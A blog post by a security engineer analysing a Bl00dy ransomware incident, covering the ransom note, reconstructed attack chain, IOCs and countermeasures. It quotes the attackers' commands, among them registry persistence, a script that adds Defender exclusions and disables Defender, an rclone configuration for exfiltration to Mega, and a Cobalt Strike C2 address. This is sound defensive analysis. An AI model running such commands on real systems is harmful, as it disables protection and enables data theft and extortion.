.bl00dy ransomware [EN]

Initial Access: N/A
Persistence: CobaltStrike, LOLbins
Credentials: LSASS Dump/PrivEscalation
Lateral: SMB, RDP
Exfil: rclone to mega
C2: CobaltStrike

On 25 September I received set of data from one Ukrainian  ransomware victim. Those samples was identified and attributed as Bl00dy Ransomware Gang tools. Unfortunately  I can`t get nor intrusion vector, nor attack timeline. However I managed higgledy-piggledy reconstruct attack pattern.

(!) Before taking any conclusions about this analysis or my humble skills, please be aware that this story is unfinished due to limited amount of data and forensic artifacts provided by victim. I did my best to shed some light on bl00dy ransomware operations. This post can be used for  beginners or entry-level investigations.

Please, read, understood and  make sure you are ready for such attack.

Literally short brief:

Bl00dy ransomware gang – one of active ransomware group, which use double extortion tactic. But instead of leak / “wall of shame” they use Telegram channel where they sell or publish stolen data (if victim refuse to pay). Initial activity was tracked from July 2022. More details can be find on (databreaches.net)

Initial data:

Victim calls for help with IOC`s and attack pattern after system was breached and data was ripped and encrypted:

Attack reconstruction:

At first look on ransom note attribution may looks easy:

GREETINGS FROM BL00DY RANSOMWARE GANG
We download your company important files / documents / databases/ mails / accounts
We publish it to the public if you dont cooperate .
filedecryptionsupport@msgsafe.io
Telegram hall of shame , where all company private data will be PUBLISHED??
https://t.me/bl00dy_Ransomware_Gang

Meanwhile ID Ransomware thinks that group email from ransom note is affiliated with Conti group:

If we would keep in mind very sophisticated story about Conti shutdown and their loud operation in Costa-Rica, we can suppose, that #Bl00dy Ransomware Gang can be just one of Conti side projects, however I did not find any solid proofs for this statement, so for  now it is just my intuition.

update 26/09/22

From the other hand, as @malwrhunterteam wittily noticed, previously this group used Babuk samples, then they switched to leaked Conti (this is why ID Ransom flags Conti) and now they use recently leaked LockBit 3.0. So they changing tools of trade like snake changes its skin.

But anyway – still they can be tied with Conti not only by code…

Now lets figure out purpose of each sample:

logs.bat [c:windowstemp] – command to start ransomware DLL

:rundll32 C:LB3_ReflectiveDll_DllMain-cyt.dll,gdll

reg.txt – task to activate logs.bat script to start encryption routine before user logon

reg add “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce” /v notepad /t REG_SZ /d “c:windowstemplogs.bat”

wddd4.bat [c:] – script  that will disable and dismantle built-in Windows Defender

powershell -command “Add-MpPreference -ExclusionPath ‘C:Windowstemp'”
powershell -command “Add-MpPreference -ExclusionExtension “.exe””
powershell -command “Add-MpPreference -ExclusionPath ‘C:'”
powershell -command “Add-MpPreference -ExclusionExtension “.dll””
Uninstall-WindowsFeature -Name Windows-Defender
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows Defender” /v DisableAntiVirus /t REG_DWORD /d 1 /f

pause

rclone.conf – rclone configuration (file transfer tool)

[remote]
type = mega
user = filedecryptionsupport@msgsafe.io
pass = ********************************

veeamsvr.exe [?] – rclone renamed (disguised) as veeam service

VT

wget.exe [?] – wget for Windows

VT

wmware-1.log [c:windowstemp] – Cobalt Strike Beacon

VT / Intezer

C2: 185.170.42{.} 93:80/g.pixel

LB3_ReflectiveDll_DllMain-cyt.dll [c:] – ransomware body itself, protected by Themida v2.x (WinLicense)

VT / Intezer

Interesting that static analysis of cryptor DLL from Intezer portal point us to LockBit 3.0 builder, which was leaked to public on previous week.


We should be obliviously curious about using c:\windows\temp path instead of \Users\** and present of attacker`s tools in root of С: drive – user account with limited privileges does not have permissions to operate there. What does it mean for DFIR? This clue can be signal for us – (probably) privilege escalation was done by Cobalt Strike, or from the other hand it was done by credential dumping from another, previous infected system (LSASS dumping/Mimikatz).

Lets try to imagine compromised system status before data encryption process:

  1. initial remote access was gained by Cobalt Strike
  2. for landing other tools wget was used
  3. data exfiltration was done by rclone to mega account
  4. builtin Windows Defender was dismantled by  simple script (after privileges escalation or by admin password)
  5. start of encryption routine will disguised by DLL sideloading, which was initiated through reg by RunServicesOnce

After finished encryption routines victim will realize that all valuable documents (files) are corrupted and not readable, moreover some part of data was stolen. Now victim must choose between negotiation about payment or stolen information will be posted/sold in group Telegram channel.

So at the end to summarize all available artifacts we could sort attackers tools in this order:

Security Countermeasures:

  • Strict Web & Email filtering against harmful/non-standard file formats and containers (macro, exploits, scripts etc)
  • Hardened policies on GPO  or EPP to prevent & control of executing embedded Windows tools (LOLBins)
  • Use NGFW/IPS solutions to detect and disrupt Cobalt Strike Beacons traffic
  • Detect and mitigate rclone top-level commands
  • Prohibition of using unsanctioned popular cloud file transfer services (Mega, Personal OneDrive, GDrive etc)
  • Use Host IPS / Exploit Prevention Technics to mitigate risk of DLL side-loading/DLL hijacking.
  • Strict control of any changes in autoruns (malware persistence and loading)
  • Use PAM solutions to control of privileges/accounts exploitation
  • Use Vulnerability Scanners (Assessment) to prevent intrusions by public known 0days

Practical tips:

If you read from start to this point you might already noticed that report is uncompleted. Sorry about this – I got only main scripts and payloads without access to Logs and other forensics sources. However you should keep in mind  that most of Ransomware groups TTPs are automated and standardized about 90%, hence you must check your security policies against those tools of trade:

I really hope this post will be useful for IT & security personnel among different organisations.

Stay health, be careful and watch your back.
Trust and help Ukrainian Army.

Glory to Ukraine.

#OptiData #InformationSecurity #Security
#Інформаційнабезпека #безпека #IOC #malware
#ransomware #bl00dy #cobaltstrike #rclone #DLL

VR

Tags: , , , , , , , ,

About Vlad

My name is Vlad. From 2016 I am Technical Lead of OptiData team. I do implementation and support of Trellix (McAfee) solutions. I like dynamic malware analysis. Also I make education courses for our customers. pastebin.com/u/VRad slideshare.net/Glok17 VR

3 responses to “.bl00dy ransomware [EN]”

  1. Vlad says :

    (!) Ukrainian version of this report available here https://radetskiy.wordpress.com/2022/09/25/bl00dy-ransomware/

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: